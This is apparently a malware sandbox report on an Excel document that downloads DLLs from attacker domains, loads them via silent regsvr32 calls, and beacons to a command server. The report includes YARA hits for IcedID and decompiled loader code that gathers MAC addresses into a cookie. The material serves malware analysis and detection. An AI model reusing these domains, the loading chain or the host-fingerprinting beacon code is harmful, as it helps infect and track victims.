                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.568273067 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.569048882 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.569077969 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.569098949 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.569123983 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.569914103 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.569937944 CEST4434917013.224.92.73192.168.2.22
Jul 6, 2021 17:43:27.569953918 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.569966078 CEST | 49170 | 443   | 192.168.2.22   | 13.224.92.73
Jul 6, 2021 17:43:27.569996119 CEST | 49170 | 443   | 192.168.2.22   | 13.224.92.73
Jul 6, 2021 17:43:27.570724964 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.570749044 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.570768118 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.570791006 CEST | 49170 | 443   | 192.168.2.22   | 13.224.92.73
Jul 6, 2021 17:43:27.571557045 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.571580887 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.571598053 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.571634054 CEST | 49170 | 443   | 192.168.2.22   | 13.224.92.73
Jul 6, 2021 17:43:27.571650982 CEST | 49170 | 443   | 192.168.2.22   | 13.224.92.73
Jul 6, 2021 17:43:27.572395086 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.572417021 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.572489023 CEST | 49170 | 443   | 192.168.2.22   | 13.224.92.73
Jul 6, 2021 17:43:27.572601080 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.573256016 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.573281050 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.573298931 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.573342085 CEST | 49170 | 443   | 192.168.2.22   | 13.224.92.73
Jul 6, 2021 17:43:27.574117899 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.574141026 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.574157953 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.574173927 CEST | 49170 | 443   | 192.168.2.22   | 13.224.92.73
Jul 6, 2021 17:43:27.574203968 CEST | 49170 | 443   | 192.168.2.22   | 13.224.92.73
Jul 6, 2021 17:43:27.574985981 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.575009108 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.575026035 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.575054884 CEST | 49170 | 443   | 192.168.2.22   | 13.224.92.73
Jul 6, 2021 17:43:27.575819016 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.575849056 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.575870037 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.575890064 CEST | 49170 | 443   | 192.168.2.22   | 13.224.92.73
Jul 6, 2021 17:43:27.575968027 CEST | 49170 | 443   | 192.168.2.22   | 13.224.92.73
Jul 6, 2021 17:43:27.576668978 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.576694012 CEST | 443   | 49170 | 13.224.92.73   | 192.168.2.22
Jul 6, 2021 17:43:27.576733112 CEST | 49170 | 443   | 192.168.2.22   | 13.224.92.73
Jul 6, 2021 17:43:27.635613918 CEST | 49170 | 443   | 192.168.2.22   | 13.224.92.73
Jul 6, 2021 17:43:27.842967987 CEST | 49171 | 80    | 192.168.2.22   | 172.67.213.115
Jul 6, 2021 17:43:27.882703066 CEST | 80    | 49171 | 172.67.213.115 | 192.168.2.22
Jul 6, 2021 17:43:27.882828951 CEST | 49171 | 80    | 192.168.2.22   | 172.67.213.115
Jul 6, 2021 17:43:27.886595011 CEST | 49171 | 80    | 192.168.2.22   | 172.67.213.115
Jul 6, 2021 17:43:27.928324938 CEST | 80    | 49171 | 172.67.213.115 | 192.168.2.22
Jul 6, 2021 17:43:28.496232986 CEST | 80    | 49171 | 172.67.213.115 | 192.168.2.22
Jul 6, 2021 17:43:28.496263981 CEST | 80    | 49171 | 172.67.213.115 | 192.168.2.22
Jul 6, 2021 17:43:28.496330976 CEST | 49171 | 80    | 192.168.2.22   | 172.67.213.115
Jul 6, 2021 17:43:31.121927023 CEST | 49170 | 443   | 192.168.2.22   | 13.224.92.73
Jul 6, 2021 17:43:31.122131109 CEST | 49171 | 80    | 192.168.2.22   | 172.67.213.115
Jul 6, 2021 17:45:24.381650925 CEST | 49169 | 80    | 192.168.2.22   | 104.21.55.83
Jul 6, 2021 17:45:24.381903887 CEST | 49168 | 80    | 192.168.2.22   | 172.67.194.117
Jul 6, 2021 17:45:24.382141113 CEST | 49167 | 80    | 192.168.2.22   | 172.67.198.51
Jul 6, 2021 17:45:24.422986984 CEST | 80    | 49168 | 172.67.194.117 | 192.168.2.22
Jul 6, 2021 17:45:24.423022985 CEST | 80    | 49167 | 172.67.198.51  | 192.168.2.22
Jul 6, 2021 17:45:24.423245907 CEST | 49168 | 80    | 192.168.2.22   | 172.67.194.117
Jul 6, 2021 17:45:24.423348904 CEST | 49167 | 80    | 192.168.2.22   | 172.67.198.51
Jul 6, 2021 17:45:24.423414946 CEST | 80    | 49169 | 104.21.55.83   | 192.168.2.22
Jul 6, 2021 17:45:24.423610926 CEST | 49169 | 80    | 192.168.2.22   | 104.21.55.83

UDP Packets

Timestamp                           | Source Port | Dest Port | Source IP    | Dest IP
Jul 6, 2021 17:43:24.458770037 CEST | 52197       | 53        | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 17:43:24.520479918 CEST | 53          | 52197     | 8.8.8.8      | 192.168.2.22
Jul 6, 2021 17:43:24.662693024 CEST | 53099       | 53        | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 17:43:24.728333950 CEST | 53          | 53099     | 8.8.8.8      | 192.168.2.22
Jul 6, 2021 17:43:24.915817976 CEST | 52838       | 53        | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 17:43:24.980243921 CEST | 53          | 52838     | 8.8.8.8      | 192.168.2.22
Jul 6, 2021 17:43:26.143511057 CEST | 61200       | 53        | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 17:43:26.206418991 CEST | 53          | 61200     | 8.8.8.8      | 192.168.2.22
Jul 6, 2021 17:43:26.265383959 CEST | 49548       | 53        | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 17:43:26.329699039 CEST | 53          | 49548     | 8.8.8.8      | 192.168.2.22
Jul 6, 2021 17:43:27.698635101 CEST | 55627       | 53        | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 17:43:27.762717962 CEST | 53          | 55627     | 8.8.8.8      | 192.168.2.22
Jul 6, 2021 17:43:27.775300026 CEST | 56009       | 53        | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 17:43:27.840548038 CEST | 53          | 56009     | 8.8.8.8      | 192.168.2.22

DNS Queries

Timestamp                           | Source IP    | Dest IP | Trans ID | OP Code            | Name                    | Type           | Class
Jul 6, 2021 17:43:24.458770037 CEST | 192.168.2.22 | 8.8.8.8 | 0xbf29   | Standard query (0) | thousandsyears.download | A (IP address) | IN (0x0001)
Jul 6, 2021 17:43:24.662693024 CEST | 192.168.2.22 | 8.8.8.8 | 0xfbeb   | Standard query (0) | voopeople.fun           | A (IP address) | IN (0x0001)
Jul 6, 2021 17:43:24.915817976 CEST | 192.168.2.22 | 8.8.8.8 | 0xccae   | Standard query (0) | uppercilio.fun          | A (IP address) | IN (0x0001)
Jul 6, 2021 17:43:26.143511057 CEST | 192.168.2.22 | 8.8.8.8 | 0xa3a3   | Standard query (0) | aws.amazon.com          | A (IP address) | IN (0x0001)
Jul 6, 2021 17:43:26.265383959 CEST | 192.168.2.22 | 8.8.8.8 | 0x4023   | Standard query (0) | aws.amazon.com          | A (IP address) | IN (0x0001)
Jul 6, 2021 17:43:27.698635101 CEST | 192.168.2.22 | 8.8.8.8 | 0xcc9c   | Standard query (0) | astrocycle.download     | A (IP address) | IN (0x0001)
Jul 6, 2021 17:43:27.775300026 CEST | 192.168.2.22 | 8.8.8.8 | 0xb2dd   | Standard query (0) | astrocycle.download     | A (IP address) | IN (0x0001)

DNS Answers

Timestamp                           | Source IP | Dest IP      | Trans ID | Reply Code   | Name                             | CName                            | Address        | Type                   | Class
Jul 6, 2021 17:43:24.520479918 CEST | 8.8.8.8   | 192.168.2.22 | 0xbf29   | No error (0) | thousandsyears.download          | -                                | 172.67.198.51  | A (IP address)         | IN (0x0001)
Jul 6, 2021 17:43:24.520479918 CEST | 8.8.8.8   | 192.168.2.22 | 0xbf29   | No error (0) | thousandsyears.download          | -                                | 104.21.52.111  | A (IP address)         | IN (0x0001)
Jul 6, 2021 17:43:24.728333950 CEST | 8.8.8.8   | 192.168.2.22 | 0xfbeb   | No error (0) | voopeople.fun                    | -                                | 172.67.194.117 | A (IP address)         | IN (0x0001)
Jul 6, 2021 17:43:24.728333950 CEST | 8.8.8.8   | 192.168.2.22 | 0xfbeb   | No error (0) | voopeople.fun                    | -                                | 104.21.12.122  | A (IP address)         | IN (0x0001)
Jul 6, 2021 17:43:24.980243921 CEST | 8.8.8.8   | 192.168.2.22 | 0xccae   | No error (0) | uppercilio.fun                   | -                                | 104.21.55.83   | A (IP address)         | IN (0x0001)
Jul 6, 2021 17:43:24.980243921 CEST | 8.8.8.8   | 192.168.2.22 | 0xccae   | No error (0) | uppercilio.fun                   | -                                | 172.67.146.88  | A (IP address)         | IN (0x0001)
Jul 6, 2021 17:43:26.206418991 CEST | 8.8.8.8   | 192.168.2.22 | 0xa3a3   | No error (0) | aws.amazon.com                   | tp.8e49140c2-frontier.amazon.com | -              | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 17:43:26.206418991 CEST | 8.8.8.8   | 192.168.2.22 | 0xa3a3   | No error (0) | tp.8e49140c2-frontier.amazon.com | dr49lng3n1n2s.cloudfront.net     | -              | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 17:43:26.206418991 CEST | 8.8.8.8   | 192.168.2.22 | 0xa3a3   | No error (0) | dr49lng3n1n2s.cloudfront.net     | -                                | 13.224.92.73   | A (IP address)         | IN (0x0001)
Jul 6, 2021 17:43:26.329699039 CEST | 8.8.8.8   | 192.168.2.22 | 0x4023   | No error (0) | aws.amazon.com                   | tp.8e49140c2-frontier.amazon.com | -              | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 17:43:26.329699039 CEST | 8.8.8.8   | 192.168.2.22 | 0x4023   | No error (0) | tp.8e49140c2-frontier.amazon.com | dr49lng3n1n2s.cloudfront.net     | -              | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 17:43:26.329699039 CEST | 8.8.8.8   | 192.168.2.22 | 0x4023   | No error (0) | dr49lng3n1n2s.cloudfront.net     | -                                | 13.224.92.73   | A (IP address)         | IN (0x0001)
Jul 6, 2021 17:43:27.762717962 CEST | 8.8.8.8   | 192.168.2.22 | 0xcc9c   | No error (0) | astrocycle.download              | -                                | 172.67.213.115 | A (IP address)         | IN (0x0001)
Jul 6, 2021 17:43:27.762717962 CEST | 8.8.8.8   | 192.168.2.22 | 0xcc9c   | No error (0) | astrocycle.download              | -                                | 104.21.37.209  | A (IP address)         | IN (0x0001)
Jul 6, 2021 17:43:27.840548038 CEST | 8.8.8.8   | 192.168.2.22 | 0xb2dd   | No error (0) | astrocycle.download              | -                                | 104.21.37.209  | A (IP address)         | IN (0x0001)
Jul 6, 2021 17:43:27.840548038 CEST | 8.8.8.8   | 192.168.2.22 | 0xb2dd   | No error (0) | astrocycle.download              | -                                | 172.67.213.115 | A (IP address)         | IN (0x0001)

HTTP Request Dependency Graph

• thousandsyears.download
• voopeople.fun
• uppercilio.fun
• astrocycle.download

HTTP Packets

Session ID | Source IP    | Source Port | Destination IP | Destination Port | Process
0          | 192.168.2.22 | 49167       | 172.67.198.51  | 80               | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp                           | kBytes transferred | Direction | Data
Jul 6, 2021 17:43:24.577158928 CEST | 0                  | OUT       | GET /div/44376,8555986111.jpg HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: thousandsyears.download
Connection: Keep-Alive
Jul 6, 2021 17:43:24.636230946 CEST | 1                  | IN        | HTTP/1.1 200 OK
Date: Tue, 06 Jul 2021 15:43:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=14400
CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 6413
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=vm7YcVJThRDoLU1IaJjXnbLneYPMgjWjTwTItXvFDJo5zRWPs1nVWI82HUwlEPm440JvAYz3Y8gmbPVtbvxbuvUMJhOAcKYbShxE3KtdcOXKy99TXetWq2VarWSKMNT7OnVXwCc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 66a9f2d2c8e94e3d-FRA
                                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                              Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                                                                                                                                                              Data Ascii: 14
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.636265993 CEST1INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 172.67.194.117 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 17:43:24.769382000 CEST | 2 | OUT | GET /div/44376,8555986111.jpg HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: voopeople.fun
Connection: Keep-Alive
Jul 6, 2021 17:43:24.843807936 CEST | 3 | IN | HTTP/1.1 200 OK
Date: Tue, 06 Jul 2021 15:43:24 GMT
Content-Type: application/octet-stream
Content-Length: 57856
Connection: keep-alive
Content-Disposition: attachment; filename=lsdfik.fml
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 6412
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=VYaHfTaTiGvO95MRIBYQi4x1j395FG8acrj4SxWRfuhJlpNjHQS1wbSNoWu%2B%2FJ4VVWSMsUkTlyAD%2FsD32Y%2BUigC9j4pL79FSATfy%2BIIFVKs9%2BlkJ1QKyieO%2B%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66a9f2d40e9f2c22-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49169 | 104.21.55.83 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 17:43:25.021378994 CEST | 64 | OUT | GET /div/44376,8555986111.jpg HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: uppercilio.fun
Connection: Keep-Alive
Jul 6, 2021 17:43:25.083971024 CEST | 64 | IN | HTTP/1.1 200 OK
Date: Tue, 06 Jul 2021 15:43:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 6413
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=6O6Tx%2Fa6JwBLjjv0b8yjDNBb7VF9LhJqq5N%2BwpKxzdeVR2rVNl8u4ZZquzMU2VV%2Bg5l7FER8JeLvV5u5CGjZyAInwDs8V7lyLYAZOZLuQpLu4BfKhgV%2FBKNeXj0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66a9f2d599581f1d-FRA
Content-Encoding: gzip
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
Data Ascii: 14
Jul 6, 2021 17:43:25.083996058 CEST | 64 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 3
Source IP: 192.168.2.22  Source Port: 49171
Destination IP: 172.67.213.115  Destination Port: 80
Process: C:\Windows\System32\regsvr32.exe

Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 17:43:27.886595011 CEST | 323 | OUT | GET / HTTP/1.1
Connection: Keep-Alive
Cookie: __gads=3565085024:1:7204:49; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=333637373036:416C627573:42414433343246413734333930453842; __io=0; _gid=67AFEDC5AC03
Host: astrocycle.download
Jul 6, 2021 17:43:28.496232986 CEST | 324 | IN | HTTP/1.1 404 Not Found
Date: Tue, 06 Jul 2021 15:43:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=vMdMK1HG5M0SJ%2FFEEBsIzCUz7xVitHncPf0wKxa%2FaVhf%2F%2Fr8iNE7uf73xwHwcU1zE%2FMreObfjJ3efAEhIRirQq9v14X%2B9fRcqhL0kb9Jdtp%2Bo6vgu5SI%2BcETYhyFRcPyIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66a9f2e779594a61-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
Jul 6, 2021 17:43:28.496263981 CEST | 324 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


HTTPS Packets

Timestamp: Jul 6, 2021 17:43:26.440140009 CEST
Source IP: 13.224.92.73  Source Port: 443
Dest IP: 192.168.2.22  Dest Port: 49170
JA3 SSL Client Fingerprint: 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
JA3 SSL Client Digest: 05af1f5ca1b87cc9cc9b25185115607d

Certificate chain (Subject | Issuer | Not Before | Not After):
CN=aws.amazon.com | CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | Wed Sep 30 02:00:00 CEST 2020 | Thu Sep 23 14:00:00 CEST 2021
CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | CN=Amazon Root CA 1, O=Amazon, C=US | Thu Oct 22 02:00:00 CEST 2015 | Sun Oct 19 02:00:00 CEST 2025
CN=Amazon Root CA 1, O=Amazon, C=US | CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon May 25 14:00:00 CEST 2015 | Thu Dec 31 02:00:00 CET 2037
CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US | Wed Sep 02 02:00:00 CEST 2009 | Wed Jun 28 19:39:16 CEST 2034

                                                                                                                                                                                                                              Code Manipulations

                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                              CPU Usage


                                                                                                                                                                                                                              Memory Usage


                                                                                                                                                                                                                              High Level Behavior Distribution


                                                                                                                                                                                                                              Behavior


System Behavior

General

Start time: 17:43:39
Start date: 06/07/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13f460000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:43:41
Start date: 06/07/2021
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: regsvr32 -silent ..\XRAY.dll
Imagebase: 0xff7e0000
File size: 19456 bytes
MD5 hash: 59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:43:42
Start date: 06/07/2021
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: regsvr32 -silent ..\XTOWN.dll
Imagebase: 0xff7e0000
File size: 19456 bytes
MD5 hash: 59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000004.00000002.2096505255.0000000000190000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
• Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmp, Author: Joe Security
• Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2100767048.0000000003401000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp, Author: Joe Security
Reputation: high

General

Start time: 17:43:45
Start date: 06/07/2021
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: regsvr32 -silent ..\XZIBIT.dll
Imagebase: 0xff7e0000
File size: 19456 bytes
MD5 hash: 59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                              Code Analysis


                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                C-Code - Quality: 25%
                                                                                                                                                                                                                                			E004D27BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                                                                                                                                                				void* __rdi;
                                                                                                                                                                                                                                				int _t23;
                                                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                				intOrPtr _t35;
                                                                                                                                                                                                                                				void* _t36;
                                                                                                                                                                                                                                				intOrPtr* _t44;
                                                                                                                                                                                                                                				long long _t46;
                                                                                                                                                                                                                                				intOrPtr* _t48;
                                                                                                                                                                                                                                				intOrPtr* _t54;
    intOrPtr* _t62;
    signed long long _t64;
    long long* _t67;
    intOrPtr* _t69;
    void* _t77;
    void* _t78;
    struct HINSTANCE__* _t79;
    void* _t80;
    CHAR* _t82;
    char* _t83;

    _t64 = __rsi;
    _t46 = __rbx;
    _t44 = _t69;
    *((long long*)(_t44 + 8)) = __rbx;
    *((long long*)(_t44 + 0x18)) = __rbp;
    *((long long*)(_t44 + 0x20)) = __rsi;
    _push(_t62);
    _t80 = __rcx;                          // destination buffer (wide string) for the collected MACs
    _t83 = L"; _gid=";                     // separator written before the first MAC
    *(_t44 + 0x10) = *(_t44 + 0x10) & 0;
    LoadLibraryA(_t82);                    // import resolved at run time instead of through the IAT
    GetProcAddress(_t79);                  // per the APIs table below, the resolved routine is GetAdaptersInfo (IPHLPAPI)
    _t67 = _t44;
    if(_t44 == 0) {
        L6:                                // fallback path: import not resolved, allocation failed, or no adapter collected
        r9d = 1;
        _t23 = E004D2990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x4d70c4, _t77, _t78);
        L7:
        return _t23;
    }
    _t24 = *_t67(); // executed           // GetAdaptersInfo, first call: size probe (ref 004D280F)
    if(_t24 == 0x6f && __rbx != 0) {       // 0x6f == ERROR_BUFFER_OVERFLOW (111): required size was returned
        GetProcessHeap();
        _t9 = _t64 + 8; // 0x8             // required size + 8
        _t36 = _t9;
        HeapAlloc(??, ??, ??);             // argument list not recovered by the decompiler
        _t62 = _t44;                       // start of the IP_ADAPTER_INFO list
        if(_t44 == 0) {
            goto L6;
        }
        _t54 = _t44; // executed
        _t27 = *_t67(); // executed       // GetAdaptersInfo, second call, fills the buffer (ref 004D2845)
        if(_t27 == 0) {                    // NO_ERROR: walk the adapter list
            _t48 = _t62;
            do {
                // +0x1c0 is IpAddressList.IpAddress.String on x64: skip adapters whose address starts with "0." (0.0.0.0)
                if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
                    _t35 =  *((intOrPtr*)(_t48 + 0x194));   // +0x194: AddressLength
                    if(_t54 - 1 <= 7) {                     // unsigned compare: 1..8 address bytes (test appears to be on AddressLength)
                        r9d = _t35;
                        _t18 = _t48 + 0x198; // 0x198       // +0x198: Address (the MAC bytes)
                        _t54 = _t80 + _t64 * 2;             // current write position in the wide output (_t64 counts characters)
                        E004D2990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78); // appends separator + MAC; formatting routine not shown
                        _t64 = _t64 + _t44;                 // advance by the number of characters written
                        _t83 = ":";                         // later MACs are separated by ":"
                    }
                }
                _t48 =  *_t48;                              // +0: Next
            } while (_t48 != 0);
            GetProcessHeap();
            _t36 = 0;
            _t23 = HeapFree(??, ??, ??);
            if(_t64 == 0) {                // nothing collected: take the fallback path
                goto L6;
            }
            goto L7;
        }
        GetProcessHeap();
        _t36 = 0;
        HeapFree(??, ??, ??);
    }
}
